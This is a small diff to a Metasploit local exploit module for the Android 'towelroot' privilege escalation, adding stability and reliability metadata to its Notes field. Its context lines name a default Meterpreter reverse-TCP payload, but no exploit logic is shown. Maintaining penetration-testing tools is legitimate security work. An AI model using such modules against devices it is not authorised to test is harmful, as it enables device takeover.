@@ -40,7 +40,11 @@ class MetasploitModule < Msf::Exploit::Local
             'WfsDelay' => 300,
             'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
           },
-          'Notes' => { 'AKA' => ['towelroot'] },
+          'Notes' => {
+            'Stability' => [CRASH_SAFE],
+            'SideEffects' => [],
+            'Reliability' => [],
+            'AKA' => ['towelroot'] },
           'DefaultTarget' => 0,
           'Targets' => [
             # Automatic targetting via getprop ro.build.model
